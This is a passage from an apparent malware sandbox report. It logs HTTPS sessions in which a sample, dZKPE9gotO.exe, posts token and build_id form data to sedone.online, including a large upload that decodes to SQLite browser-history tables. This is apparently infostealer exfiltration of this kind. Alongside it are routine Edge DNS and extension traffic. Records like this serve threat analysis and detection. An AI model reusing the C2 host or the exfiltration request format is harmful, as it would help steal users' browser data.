16 | 192.168.2.7 | 49815 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:07 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----6XBI5FCBIEUAIEK6PPPP
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 3165
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:07 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------6XBI5FCBIEUAIEK6PPPPContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------6XBI5FCBIEUAIEK6PPPPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------6XBI5FCBIEUAIEK6PPPPCont
2024-12-16 14:40:08 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:08 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49831 | 162.159.61.3 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:08 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
2024-12-16 14:40:08 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 16 Dec 2024 14:40:08 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f2f6d467c6843fb-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 24 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom$A)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49836 | 162.159.61.3 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:08 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
2024-12-16 14:40:08 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 16 Dec 2024 14:40:08 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f2f6d467c2241e1-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1c 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom(c)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49840 | 172.64.41.3 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:08 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
2024-12-16 14:40:08 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 16 Dec 2024 14:40:08 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f2f6d468b8318c4-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49825 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:08 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----XTR9HLFK6F37YU3WT00H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 207993
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------XTR9HLFK6F37YU3WT00HContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------XTR9HLFK6F37YU3WT00HContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------XTR9HLFK6F37YU3WT00HCont
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 14:40:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:10 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49843 | 162.159.61.3 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:09 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49833 | 142.250.181.65 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:09 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-16 14:40:09 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 154477
                                                                                                                                                                                                                                                X-GUploader-UploadID: AFiumC63VOvQiPFpJWwc9IcQDmFYDJbx2ZYKPk_7CoPD8sbhxpQYBVt93n1xgAFt1IxysaIT
                                                                                                                                                                                                                                                X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                                                                Date: Sun, 15 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                Expires: Mon, 15 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                Age: 81715
                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 49846 | 162.159.61.3 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:09 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 49850 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:10 UTC | 327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----K6FKFCT00ZU3E37900RQ
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 68733
                                                                                                                                                                                                                                                Connection: Keep-Alive
